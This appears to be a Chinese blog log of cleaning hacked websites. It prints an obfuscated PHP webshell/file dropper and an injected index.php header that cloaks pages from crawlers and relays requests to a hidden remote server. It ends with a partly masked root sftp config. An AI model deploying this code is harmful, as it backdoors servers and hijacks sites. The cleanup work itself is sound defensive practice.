$_wKdzBs=ru("echelonsfGxne3AtOi"); echo $M[51].$M[24].$M[57].$M[57].$M[57].$M[43].$M[1]; $_cszEUio=xy("hotspur3thieves"); ;/*bulkhead*/; ;/*$_nu9b*/; } ;/*griffs*/; exit; } ;/*twill*/; if ( (!empty($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]])) && (!empty($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19]])) ) { ;/*$_7ieh*/; $_rDcINj=str_replace("FN","","postman"); $_Xjz5q=base64_decode($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]]); $_nu9b=base64_decode($_POST[$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19]]); }else { ;/*CE83ra2y*/; ;/*c6SdH0Pl*/; ;/*$_njSqalt*/; if (!empty($_GET[$M[34].$M[33].$M[52]])) { ;/*$_Oh3*/; $_tLHvr=l($_GET[$M[34].$M[33].$M[52]]); ;/*Mb4wz*/; $_Xjz5q=trim(su($_tLHvr.$M[33].$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30].$M[17].$M[30].$M[60].$M[30])); $_nu9b=trim(su($_tLHvr.$M[33].$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19].$M[17].$M[30].$M[60].$M[30])); } ;/*u4b*/; } $_mlsJ=explode("T","soumise"); ;/*86QK*/; if (empty($_Xjz5q) || empty($_nu9b)) { ;/*carafe*/; exit; } ;/*ICb1F*/; ;/*$_Oh3*/; if (substr($_nu9b,0,1)=='/' && substr($_nu9b,-1,1)!='/') { ;/*$_qt2*/; ;/*jowl*/; ;/*$_bdyjMTK*/; $_9LmM=$_QcNpZ.$_nu9b; ;/*$_W03F*/; ;/*jimjam*/; $_fqp2C=$_ITe.$_ZaJK4nT.$_nu9b; ;/*rvlIP*/; preg_match('/(\/.+)\//',$_9LmM,$_dhmy); $_ICTbre5=$_dhmy[1]; ;/*envy*/; ;/*repel*/; $_Nfm8RS = explode("/",ltrim(str_replace($_QcNpZ,'',$_ICTbre5),"/")); ;/*finglas*/; $_c9GbEW = $_QcNpZ; ;/*thibauld*/; ;/*OCp*/; foreach($_Nfm8RS as $_XEv3) { $_c9GbEW .= "/" . $_XEv3; if ( $_ZtY9EF( $_c9GbEW ) ) { $_Oh3( $_c9GbEW, 0755 ); } else { mkdir( $_c9GbEW, 0755, true ); } } ;/*valuable*/; ;/*$_rHC29mV*/; ;/*louviers*/; if ( $_sVwj8($_9LmM) ) { ;/*senault*/; $_Oh3($_9LmM,0777); ;/*qXt1*/; $_mlsJ=explode("N","cabala"); $_O7MZfz($_9LmM); ;/*specula*/; } $_JVo=dn(1767594237); $_guSMY($_9LmM,$_Xjz5q); ;/*$_t6H*/; if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { ;/*$_ICTbre5*/; $_bTD3dn=1; $_rDcINj=str_replace("n0K","","pitting"); ;/*mystery*/; echo $_fqp2C; ;/*$_edwT8*/; ;/*lashings*/; } ;/*$_jN3tCgQ*/; $_wKdzBs=ru("curdsYX2OdF"); } ;/*$_wET7*/; ;/*slm*/; ;/*bloo*/; if($_nu9b==$M[55].$M[28].$M[43].$M[24].$M[1].$M[41]) { ;/*swerves*/; $_pPVrmkM=array(); ;/*gewgaw*/; ;/*dardant*/; $_SN7=array(); ;/*pobTRG*/; ;/*cataract*/; $_N69C=0; ;/*$_YphNi*/; $_pPVrmkM[]=$_QcNpZ; $_cszEUio=xy("lydiaRUX6LQGFNconveyed"); $_SN7[0][]=$_QcNpZ; ;/*$_jN3tCgQ*/; while(!empty($_SN7[$_N69C])) { foreach($_SN7[$_N69C] as $_9h52zN) { $_cw8u0M=$_Dm5ok6($_9h52zN.$M[69].$M[72],GLOB_ONLYDIR); if (!empty($_cw8u0M)) { foreach($_cw8u0M as $_RyCT) { if ( preg_match('/plugin[s]?$/si',$_RyCT)==1 ){continue;} $_SN7[$_N69C+1][]=$_RyCT; $_pPVrmkM[]=$_RyCT; $_Oh3($_RyCT,0755); } } } $_N69C++; if (count($_pPVrmkM)>=1000) {break;} } if ( count($_pPVrmkM)<4 ) { $_mf2=array(); $_mf2[]=$M[40].$M[41].$M[28].$M[2].$M[19].$M[54]; ;/*$_cw8u0M*/; ;/*$_x3weLZl*/; $_mf2[]=$M[40].$M[43].$M[64].$M[15].$M[34].$M[24].$M[19].$M[54]; ;/*$_VKGeF4d*/; ;/*scurry*/; $_mf2[]=$M[30].$M[19].$M[41].$M[52].$M[15].$M[28].$M[30].$M[19].$M[54]; $_mf2[]=$M[64].$M[54].$M[54]; ;/*$_rHC29mV*/; $_mlsJ=explode("b","puget"); $_mf2[]=$M[64].$M[28].$M[64].$M[48].$M[19]; ;/*pawned*/; ;/*DzY8*/; $_mf2[]=$M[20].$M[19].$M[43].$M[24].$M[19].$M[55]; ;/*$_Dm5ok6*/; ;/*wJPk*/; ;/*04eTFKp*/; $_mf2[]=$M[15].$M[40].$M[25].$M[55].$M[28].$M[55].$M[26]; ;/*lanchets*/; $_mf2[]=$M[25].$M[28].$M[64].$M[68].$M[34].$M[52]; ;/*dawned*/; $_mf2[]=$M[24].$M[28].$M[30].$M[28].$M[25].$M[28].$M[54].$M[19]; ;/*DCxru*/; $_mf2[]=$M[24].$M[28].$M[30].$M[28]; ;/*incest*/; ;/*$_68jpMNA*/; ;/*yA2rFLW*/; $_mf2[]=$M[31].$M[54]; ;/*$_Q4wAq0*/; $_mf2[]=$M[15].$M[1].$M[2]; $_mf2[]=$M[34].$M[54].$M[19].$M[55]; ;/*tract*/; $_mf2[]=$M[51].$M[1].$M[43].$M[30].$M[54]; ;/*$_TybU*/; shuffle($_mf2); ;/*laborers*/; ;/*$_8AIHxgq*/; for($_hSP=0;$_hSP<3;$_hSP++) { $_edwT8=$_QcNpZ.'/'.$_mf2[$_hSP]; mkdir($_edwT8,0755,true); if ( $_ZtY9EF($_edwT8) ){$_pPVrmkM[]=$_edwT8;} } } ;/*H0d*/; $_bTD3dn=0; ;/*pwuj*/; $_HCOBFIL=$M[40].$M[43].$M[24].$M[19].$M[60].$M[17].$M[52].$M[48].$M[52]; ;/*9xtTQ*/; for($_m0DNYye=1;$_m0DNYye<=10;$_m0DNYye++) { $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_9LmM=$_ICTbre5.'/'.$_HCOBFIL; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_HCOBFIL; if ( !$_sVwj8($_9LmM) ) { $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } ;/*XS4y*/; if ($_bTD3dn==0) { $_wKdzBs=ru("pondered0XRmMwLYD"); ;/*halters*/; for($_m0DNYye=1;$_m0DNYye<=10;$_m0DNYye++) { $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_HCOBFIL=$_wET7($_ICTbre5).$M[17].$M[52].$M[48].$M[52]; $_9LmM=$_ICTbre5.'/'.$_HCOBFIL; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_HCOBFIL; if ( !$_sVwj8($_9LmM) ) { $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } ;/*$_hSP*/; } $_JVo=dn(1763909597); if ($_bTD3dn==0) { ;/*$_9h52zN*/; ;/*dWCnIwu*/; $_ICkM=$M[65].$M[62]; ;/*Lg3*/; ;/*hoped*/; ;/*KF85XBV*/; $_ICkM.=$M[25].$M[26].$M[53].$M[70]; ;/*moonblue*/; ;/*Mga*/; $_ICkM.=$M[34].$M[28].$M[51]; ;/*$_m0DNYye*/; $_ICkM.=$M[15].$M[24].$M[19]; $_ICkM.=$M[55].$M[3].$M[60].$M[42]; ;/*gobble*/; ;/*$_g85Z*/; $_ICkM.=$M[52].$M[54].$M[31]; ;/*sweety*/; $_ICkM.=$M[30].$M[41].$M[67]; ;/*jnK*/; $_ICkM.=$M[20].$M[6].$M[29].$M[43].$M[68]; $_ICkM.=$M[40].$M[16].$M[46]; $_ICkM.=$M[48].$M[2].$M[1]; ;/*echaude*/; ;/*into*/; $_ICkM.=$M[12].$M[64].$M[39]; for($_m0DNYye=1;$_m0DNYye<=11;$_m0DNYye++) { $_m0DNYye==11 ? $_ICTbre5=$_QcNpZ : $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_rHC29mV=str_shuffle($_ICkM); $_xS7=substr($_rHC29mV,0,mt_rand(3,10)).$M[17].$M[52].$M[48].$M[52]; $_9LmM=$_ICTbre5.'/'.$_xS7; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_xS7; $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } } ;/*knF73v*/; if ( isset($_bTD3dn) && $_bTD3dn==1 ) { ;/*hating*/; $_lupLq($_9LmM, strtotime($M[57].$M[70].$M[46].$M[46].$M[45].$M[24].$M[28].$M[26].$M[54], time())); ;/*8kYNcyJ*/; ;/*$_JVo*/; if ( $_ICTbre5!=$_QcNpZ ) { ;/*pisspots*/; ;/*eXycR*/; $_OxdcIPr=$_ICTbre5.$M[69].$M[17].$M[48].$M[30].$M[28].$M[64].$M[64].$M[19].$M[54].$M[54]; if ($_sVwj8($_OxdcIPr)) { ;/*cJMVn*/; $_Oh3($_OxdcIPr,0777); ;/*$_rHC29mV*/; $_guSMY($_OxdcIPr,''); $_O7MZfz($_OxdcIPr); } if ( $_wET7($_9LmM)!=$M[40].$M[43].$M[24].$M[19].$M[60].$M[17].$M[52].$M[48].$M[52] ) { ;/*bhoeQ9*/; ;/*maidens*/; $_jN3tCgQ=''; ;/*$_Dd6*/; ;/*Mbzfs0*/; foreach( $_Dm5ok6($_ICTbre5.$M[69].$M[72].$M[17].$M[52].$M[48].$M[52]) as $_qezuS ) { $_jN3tCgQ.=$M[18].$_wET7($_qezuS); } ;/*vocalism*/; ;/*$_ITe*/; $_jN3tCgQ=ltrim($_jN3tCgQ,$M[18]); ;/*baggot*/; $_uhUZXi=$M[14].$_eiavw2z; ;/*18FzDk4L*/; $_uhUZXi.="\n".$M[50].$M[9].$M[40].$M[15].$M[19].$M[54].$M[36].$M[28].$M[30].$M[64].$M[48].$M[45].$M[38].$M[11].$M[61].$_jN3tCgQ.$M[23].$M[56].$M[38].$M[49]; ;/*$_umYhCl*/; $_uhUZXi.="\n".$M[63].$M[55].$M[24].$M[19].$M[55].$M[45].$M[28].$M[15].$M[15].$M[1].$M[53].$M[58].$M[24].$M[19].$M[43].$M[26]; ;/*ladders*/; $_uhUZXi.="\n".$M[32].$M[15].$M[15].$M[1].$M[53].$M[45].$M[51].$M[55].$M[1].$M[41].$M[45].$M[28].$M[15].$M[15]; ;/*emh*/; $_uhUZXi.="\n".$M[50].$M[69].$M[9].$M[40].$M[15].$M[19].$M[54].$M[36].$M[28].$M[30].$M[64].$M[48].$M[49]; ;/*loughs*/; $_wKdzBs=ru("solomonl"); $_guSMY($_OxdcIPr,$_uhUZXi); ;/*$_RyCT*/; ;/*h4N2i*/; $_lupLq($_9LmM, strtotime($M[57].$M[70].$M[46].$M[46].$M[45].$M[24].$M[28].$M[26].$M[54], time())); } } } ;/*KdzLF*/; function su($_zMfuG) { $_Q4wAq0=""; if ( function_exists($M[64].$M[34].$M[55].$M[15].$M[33].$M[19].$M[60].$M[19].$M[64]) ) { $_pk19yQ=curl_init(); curl_setopt ($_pk19yQ, CURLOPT_URL, $_zMfuG); curl_setopt ($_pk19yQ, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($_pk19yQ, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt( $_pk19yQ, CURLOPT_SSL_VERIFYHOST, FALSE ); curl_setopt( $_pk19yQ, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt( $_pk19yQ, CURLOPT_TIMEOUT, 30); curl_setopt ($_pk19yQ, CURLOPT_HEADER, 0); $_Q4wAq0 = curl_exec($_pk19yQ); curl_close($_pk19yQ); }else { $_Q4wAq0=file_get_contents($_zMfuG); } return $_Q4wAq0; } ;/*Sn2cRF*/; ;/*0jaZEAe*/; ;/*$_XEv3*/; ?>

tlc.txt内容为1
将他们删除。注意到index.php等文件修改日期与webshell相同,头部被植入加密部分

1
2
3
<?php
 goto Q3PzL; Pz50r: if (strpos($onzye, "\152\x70\x32\60\62\x33") !== false) { goto ICDIW; } goto feg0I; sPvK4: $kDw7W = urlencode(@$_SERVER["\x48\124\124\x50\137\x52\x45\x46\x45\122\x45\122"]); goto i7YFY; cLeNu: $u_123 = curl_init(); goto O17xo; GUiLP: dh39H: goto PGhwT; lvqC0: $C00PX = urlencode($_SERVER["\110\124\124\x50\137\x48\117\123\x54"]); goto fhxlP; IzrrP: if (strpos($onzye, "\x66\x61\166\x69\143\157\156\56\151\x63\x6f") !== false) { goto FUs7b; } goto NG3Q9; koBlq: on84q($BdhEj, "\61"); goto GwRx9; RhQHP: exit; goto fi4L3; i7Kcc: header("\x48\124\124\x50\x2f\x31\56\x31\40\x34\60\64\40\x4e\157\164\40\x46\x6f\165\x6e\x64"); goto joXq7; bmfEX: ADo8X: goto Pz50r; eVndT: ICDIW: goto i7Kcc; i3WhK: $cfzWG = curl_exec($u_123); goto NPq05; fV5Np: exit; goto wGLdE; c_DY0: $CsxQD = $_SERVER["\123\103\122\x49\x50\124\137\x4e\x41\115\105"]; goto CajuY; ESm_2: if (!empty($LR82d)) { goto KcWHX; } goto zRThS; aRSyK: echo "\157\153"; goto BLBwC; U3jyY: curl_setopt($u_123, CURLOPT_RETURNTRANSFER, true); goto HpxdV; vgAq8: function HVQzI($bCJNW) { goto GVxEL; jXVY4: Ia03f: goto T9T0v; fRmo8: fclose($Hdx4m); goto l4njp; aV23E: if (!$Hdx4m) { goto Ia03f; } goto MAhde; l4njp: return $iZgFy; goto jXVY4; MAhde: $iZgFy = fread($Hdx4m, filesize($bCJNW)); goto fRmo8; T9T0v: return false; goto QcaCs; GVxEL: $Hdx4m = fopen($bCJNW, "\162"); goto aV23E; QcaCs: } goto o7E_t; SPtAd: $LR82d = trim($LR82d) . "\15\xa" . "\x53\x69\x74\145\155\x61\160\x3a\x20{$khOyn}"; goto uC7wa; rISDH: $CsxQD = $CsxQD . "\x3f"; goto kWaWd; pymXb: FUs7b: goto j7hlu; MMmgl: curl_setopt($u_123, CURLOPT_SSL_VERIFYHOST, FALSE); goto i3WhK; fi4L3: return; goto gZGp6; Xo4Ii: $xxYrc = $_SERVER["\110\124\x54\120\x5f\103\x4c\111\105\x4e\124\x5f\x49\120"]; goto K51lJ; PGhwT: $xxYrc = urlencode($xxYrc); goto F8qfy; O17xo: curl_setopt($u_123, CURLOPT_URL, $sMWo7); goto U3jyY; gwGei: oyrH1: goto RhQHP; feg0I: if (substr($cfzWG, 0, 5) == "\x3c\x3f\x78\x6d\x6c") { goto UOyS7; } goto UJqv3; aTC9h: $_SERVER["\122\105\121\125\105\123\x54\137\x53\x43\x48\105\115\105"] = "\150\164\164\160\163"; goto asYIX; IMwmM: if (!empty($_SERVER["\x52\105\121\125\x45\x53\124\137\123\103\110\105\115\105"]) and $_SERVER["\122\105\x51\x55\x45\123\124\x5f\x53\103\110\105\x4d\105"] == "\150\164\164\x70\x73" or !empty($_SERVER["\x48\124\124\120\x53"]) and $_SERVER["\x48\x54\x54\x50\123"] == "\157\156" or !empty($_SERVER["\x53\x45\x52\x56\x45\122\x5f\120\x4f\122\124"]) and $_SERVER["\123\x45\x52\x56\105\x52\137\120\117\x52\x54"] == "\64\64\63" or isset($_SERVER["\x48\124\124\120\137\x58\137\x46\117\122\x57\101\x52\104\x45\x44\137\x50\122\x4f\x54\x4f"]) and $_SERVER["\x48\124\124\120\137\x58\x5f\106\x4f\x52\x57\x41\x52\104\105\x44\x5f\120\122\x4f\x54\x4f"] == "\x68\164\164\x70\x73") { goto wt7he; } goto H066U; zRThS: if (!(strpos($onzye, "\162\x6f\142\157\164\163\56\164\170\x74") !== false)) { goto W0XDg; } goto beCHo; n62jh: ON84Q("\x72\x6f\x62\157\x74\163\x2e\164\170\164", $LR82d); goto gwGei; OWiOl: goto fdnq8; goto eVndT; BLBwC: exit; goto z7PSC; uEuvU: $J0L00 = urlencode(@$_SERVER["\110\124\x54\x50\137\101\103\103\x45\120\124\137\114\101\x4e\107\x55\101\x47\105"]); goto sN56l; kQBcr: curl_setopt($u_123, CURLOPT_SSL_VERIFYPEER, FALSE); goto MMmgl; ehCVl: if (!preg_match("\57\x28\x53\145\x7a\156\141\155\102\157\164\174\x6a\141\166\141\x7c\123\x63\162\x61\x70\171\x7c\123\x77\x69\x66\x74\x62\x6f\x74\174\x4a\141\x75\156\164\171\x7c\103\x72\x61\167\x6c\104\141\x64\x64\x79\174\151\x6e\x64\171\x20\114\x69\142\x72\x61\162\x79\174\x6d\x6a\61\x32\x62\x6f\164\174\x75\156\x69\x76\x65\x72\x73\141\154\x46\x65\145\144\120\141\x72\x73\x65\x72\x7c\102\141\162\x6b\162\157\167\x6c\145\x72\174\101\155\x61\x7a\x6f\x6e\x42\x6f\164\x7c\160\x79\164\150\157\156\55\162\x65\x71\165\x65\163\164\163\x7c\101\x68\162\x65\x66\x73\102\157\164\x7c\x65\x7a\x6f\157\155\x73\x7c\104\x6f\x74\102\157\x74\x7c\x4a\151\153\145\123\x70\151\144\x65\x72\174\x43\x65\x6e\163\x79\163\111\x6e\163\x70\145\143\x74\x7c\x59\151\163\157\165\123\160\x69\144\x65\162\174\171\x61\156\x64\145\x78\102\x6f\x74\x7c\x4f\102\157\164\x7c\x47\120\x54\x42\x6f\x74\x7c\143\x6c\141\x75\144\145\x62\x6f\164\x7c\x48\x65\x72\x69\164\162\151\x78\x7c\120\x79\164\150\157\156\x7c\x64\151\x67\x45\170\164\174\146\x65\x65\x64\x6c\x79\x7c\131\171\x53\x70\x69\144\145\162\x7c\123\145\x6d\x72\x75\x73\150\x42\157\x74\x7c\105\x61\163\x6f\x75\123\160\151\144\145\162\174\x50\145\x74\x61\154\x42\157\164\x7c\x70\171\164\x68\157\156\55\165\162\x6c\154\x69\x62\x7c\110\x74\x74\160\x43\154\x69\x65\156\164\174\104\141\x74\x61\106\157\162\x53\x45\117\174\x41\x70\141\143\150\145\102\145\156\x63\150\x7c\x50\141\x6c\x6f\141\x6c\164\x6f\x6e\145\x74\167\x6f\162\153\x73\x7c\101\x73\153\124\142\106\130\x54\x56\x7c\x62\x79\x74\x65\163\x70\x69\x64\145\x72\x7c\120\141\161\154\145\142\157\x74\x7c\x5a\155\105\x75\x7c\107\157\x2d\150\x74\164\160\55\x63\154\151\145\x6e\164\174\x46\x65\145\144\x44\x65\x6d\x6f\x6e\x7c\x4c\x69\x67\x68\164\x44\x65\x63\x6b\x52\x65\160\157\x72\164\163\x20\102\157\x74\174\x43\x6f\157\x6c\x70\141\x64\x57\x65\142\153\x69\x74\51\57\151", $_SERVER["\x48\124\x54\x50\137\x55\123\x45\x52\137\101\107\105\116\x54"])) { goto M20fC; } goto F2zsX; Zb824: $sMWo7 = $Hf23t . "\x3f\x61\147\x65\156\x74\x3d{$re_65}\x26\162\x65\146\x65\162\75{$kDw7W}\x26\x6c\141\156\147\x3d{$J0L00}\x26\151\160\x3d{$xxYrc}\46\x64\x6f\155\x3d{$C00PX}\46\150\x74\164\160\x3d{$BbVC1}\46\165\162\151\x3d{$onzye}\x26\x70\x63\x3d{$IgDXb}\x26\162\x65\x77\x72\151\164\145\141\142\x6c\x65\75{$vvypT}\46\x73\x63\x72\x69\160\164\75{$FgK0R}\46\163\x69\164\x65\x6d\x61\x70\x3d" . urlencode($khOyn); goto eBqRT; O3ilp: if (isset($_SERVER["\x48\x54\x54\x50\x5f\x58\137\106\117\122\x57\x41\122\x44\105\104\x5f\106\x4f\122"])) { goto VcImj; } goto Hq7wK; Hq7wK: goto dh39H; goto w5VHi; joXq7: fdnq8: goto JV7ud; j3NSS: $YwVDi = "\56\143\157\x6d\x2f"; goto V5PCU; oGFWn: goto xnBwY; goto LDXJ0; UJqv3: header("\103\x6f\156\164\145\x6e\x74\x2d\124\171\x70\x65\x3a\x20\164\145\170\x74\x2f\150\164\155\x6c\x3b\x20\x63\x68\141\162\163\x65\x74\x3d\x75\164\x66\55\70"); goto oGFWn; LR00l: header("\x43\157\x6e\164\x65\x6e\x74\55\x54\x79\160\145\72\x20\x74\x65\170\x74\x2f\x78\x6d\154\x3b\x20\x63\150\x61\x72\x73\145\164\x3d\165\164\x66\x2d\x38"); goto JtZw6; JtZw6: xnBwY: goto OWiOl; sAZxw: $LR82d = "\125\x73\145\x72\x2d\141\147\x65\x6e\x74\72\x20\52\xd\12\101\x6c\x6c\157\167\72\x20\x2f"; goto wq6rF; SE3Xo: goto PWuY6; goto cuL75; cuL75: MlKzx: goto XVVOx; Q3PzL: $IgDXb = "\x55\x31\125\x42\126\121\x6f\64"; goto j3NSS; PEMKb: $BdhEj = "\164\x6c\143\x2e\x74\170\164"; goto h4gZB; RoVhv: if (!empty($cfzWG)) { goto apZHz; } goto cLeNu; x2mLL: function On84Q($bCJNW, $iZgFy) { goto xep1i; v5nHn: fclose($Hdx4m); goto B4TLF; sPcwS: fwrite($Hdx4m, $iZgFy); goto v5nHn; tqPv5: o7ha5: goto FecjU; naS33: if (!$Hdx4m) { goto o7ha5; } goto sPcwS; B4TLF: return true; goto tqPv5; xep1i: $Hdx4m = fopen($bCJNW, "\167"); goto naS33; FecjU: return false; goto QsqzB; QsqzB: } goto vgAq8; N_nWZ: $sMWo7 = $Hf23t . "\x3f\x61\147\145\156\164\x3d{$re_65}\46\x72\145\146\x65\162\x3d{$kDw7W}\46\154\x61\x6e\x67\75{$J0L00}\46\151\160\x3d{$xxYrc}\46\x64\157\155\75{$C00PX}\x26\x68\x74\164\160\x3d{$BbVC1}\46\x75\162\x69\75{$onzye}\46\x70\143\75{$IgDXb}\46\x72\145\x77\162\151\x74\x65\x61\x62\x6c\145\75{$vvypT}\46\163\x63\162\x69\160\164\x3d{$FgK0R}"; goto ucf7o; i_w1I: CXV9F: goto xLTSp; XVVOx: $CsxQD = "\x2f\x3f"; goto eOumY; wyPKV: W0XDg: goto HhP0D; i7YFY: $re_65 = urlencode($_SERVER["\110\x54\x54\x50\137\x55\x53\x45\x52\x5f\x41\107\x45\x4e\124"]); goto lvqC0; F8qfy: $FgK0R = urlencode($_SERVER["\x53\103\x52\x49\120\x54\x5f\x4e\101\x4d\x45"]); goto IMwmM; V5PCU: $TW_jg = "\x34\x34\x37\61\x2e\x61\x72\x74\x69"; goto E2Woj; s7Av1: CZw92: goto ZvpRo; eBqRT: DoYCK: goto MdLoL; E0vbj: VcImj: goto flseZ; KS7PE: $vvypT = HvQzI($BdhEj); goto q7Nmc; hKJLw: $ybJan = "\x64\165\x63\153\144\165\x63\x6b\147\x6f\174\x67\157\x6f\x67\154\145\174\141\x6f\154\174\131\141\150\157\x6f\x7c\142\x69\x6e\147"; goto ehCVl; K51lJ: goto dh39H; goto E0vbj; Z_7yA: HtX8k: goto ImT06; MdLoL: $cfzWG = @file_get_contents($sMWo7); goto RoVhv; vypMh: if (empty($cfzWG)) { goto hBvz5; } goto t1FHh; F2zsX: header("\110\x54\x54\120\57\x31\56\60\x20\64\60\x33\40\106\157\162\142\x69\x64\144\x65\x6e"); goto fV5Np; gZGp6: hBvz5: goto JU5BW; wq6rF: $khOyn = "{$BbVC1}\x3a\x2f\57" . $C00PX . $CsxQD . "\x73\x69\164\x65\x6d\141\160\x2e\x78\x6d\154"; goto SPtAd; QuRaC: $BbVC1 = urlencode($_SERVER["\x52\x45\121\125\x45\123\124\x5f\x53\103\x48\x45\115\105"]); goto jYRml; GwRx9: XS6rP: goto mJN9n; tai0M: $xxYrc = $_SERVER["\122\x45\x4d\117\124\x45\137\101\104\x44\x52"]; goto sPvK4; H066U: $_SERVER["\122\105\121\125\x45\x53\124\x5f\x53\x43\x48\105\115\105"] = "\x68\x74\164\x70"; goto icTuN; icTuN: goto gWlmg; goto nwmm0; w5VHi: qSFnt: goto Xo4Ii; tmGD9: xsZWg: goto sAZxw; y3_Xo: if (!is_file($BdhEj)) { goto KMNyK; } goto KS7PE; ZvpRo: if ($vvypT == 0) { goto MlKzx; } goto MbtjR; z7PSC: QOAkV: goto PEMKb; HpxdV: curl_setopt($u_123, CURLOPT_FOLLOWLOCATION, false); goto kQBcr; zfwa0: goto Cls4u; goto Z_7yA; NPq05: curl_close($u_123); goto u09Mv; GLjhg: echo $khOyn . "\72\x20" . $JHIHy . "\x3c\x62\162\x2f\76"; goto Zb824; q7Nmc: goto VFktA; goto DEf96; h4gZB: $vvypT = 0; goto y3_Xo; Ne4xw: if ($cfzWG === "\x6f\x6b") { goto CXV9F; } goto lSxj_; d5Jkj: $i0oQL = "\x74\160\x3a\57\57\143\167"; goto UwDDm; dSm71: $iqxFs = "\x68\x74"; goto d5Jkj; UwDDm: $Hf23t = $iqxFs . $i0oQL . $TW_jg . $XhGp0 . $YwVDi; goto hKJLw; fhxlP: if (isset($_SERVER["\110\124\x54\120\137\103\114\x49\x45\116\x54\137\x49\x50"])) { goto qSFnt; } goto O3ilp; aa89y: goto XS6rP; goto i_w1I; eOumY: PWuY6: goto tmGD9; ImT06: $LR82d = ''; goto N_nWZ; JV7ud: echo $cfzWG; goto ESm_2; sN56l: error_reporting(0); goto tai0M; kMzIO: exit; goto bmfEX; E2Woj: $XhGp0 = "\163\x74\x73\141\167"; goto dSm71; flseZ: $xxYrc = $_SERVER["\110\124\x54\120\137\x58\137\x46\x4f\x52\127\101\x52\104\105\104\137\106\117\122"]; goto GUiLP; uC7wa: $JHIHy = ''; goto GLjhg; LDXJ0: UOyS7: goto LR00l; asYIX: gWlmg: goto x2mLL; jYRml: if (!(strpos($onzye, "\164\x6c\143\164\x6c\143") !== false)) { goto QOAkV; } goto aRSyK; qhSy6: $cfzWG = @file_get_contents($gS141); goto Ne4xw; o7E_t: $onzye = urlencode($_SERVER["\122\x45\121\x55\x45\x53\x54\137\x55\122\x49"]); goto QuRaC; nyaa9: KcWHX: goto n62jh; DEf96: KMNyK: goto k6gD4; xWir5: goto mMHV2; goto pymXb; PJDII: ON84Q($BdhEj, "\60"); goto aa89y; nwmm0: wt7he: goto aTC9h; CajuY: if (strpos($CsxQD, "\x69\156\x64\x65\170\56\160\150") !== false) { goto CZw92; } goto rISDH; k6gD4: $gS141 = $BbVC1 . "\x3a\x2f\57" . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\x54"] . "\57\164\x6c\x63\164\x6c\x63"; goto qhSy6; mJN9n: VFktA: goto IzrrP; kWaWd: goto xsZWg; goto s7Av1; JU5BW: Cls4u: goto xWir5; Cdbk5: header("\x48\124\x54\120\57\61\x2e\x30\40\65\60\60\40\x49\156\164\x65\x72\156\x61\154\x20\123\x65\162\x76\145\162\x20\105\x72\x72\x6f\x72"); goto kMzIO; u09Mv: apZHz: goto vypMh; t1FHh: if (!(substr($cfzWG, 0, 10) == "\145\162\x72\x6f\162\40\x63\157\x64\x65" or $cfzWG == "\x35\60\60" or strpos($cfzWG, "\x42\x61\x64\40\107\141\164\x65\x77\x61\171") !== false)) { goto ADo8X; } goto Cdbk5; ucf7o: if (!(strpos($onzye, "\160\151\x6e\147\163\x69\x74\145\155\x61\x70") !== false)) { goto DoYCK; } goto c_DY0; NG3Q9: if (strpos($onzye, "\162\157\142\x6f\164\163\56\x74\170\x74") !== false or strpos($onzye, "\152\x70\62\x30\62\x33") !== false or strpos($onzye, "\160\151\x6e\147\163\151\164\x65\x6d\x61\160") !== false or preg_match("\x40\x5e\x2f\50\x2e\x2a\x3f\x29\56\170\x6d\154\x24\100\x69", $_SERVER["\x52\105\121\x55\x45\x53\124\137\x55\x52\111"]) or preg_match("\57\x28{$ybJan}\x29\57\x69", $_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"]) or preg_match("\x2f\x28{$ybJan}\x29\57\x69", @$_SERVER["\x48\x54\124\120\x5f\x52\105\x46\105\x52\x45\x52"])) { goto HtX8k; } goto zfwa0; HhP0D: goto oyrH1; goto nyaa9; wGLdE: M20fC: goto uEuvU; MbtjR: $CsxQD = "\57"; goto SE3Xo; lSxj_: $vvypT = 0; goto PJDII; xLTSp: $vvypT = 1; goto koBlq; beCHo: oN84q("\x72\x6f\x62\x6f\164\x73\56\x74\x78\x74", $cfzWG); goto wyPKV; j7hlu: mMHV2:
?>

将其移除后保存。代码高度混淆,但看得出来webshell特征,稍后分析。

其他站点同样被植马,依次删除。注意到logo.png修改时间接近,检查是否为图片马,但,不是。

/www/wwwroot/******.online/.vscode/sftp.json发现sftp配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
    "name": "aaPanel PHP Server",
    "host": "160.***.***.236",
    "protocol": "sftp",
    "port": 22,
    "username": "root",
    "password": "12***23A",
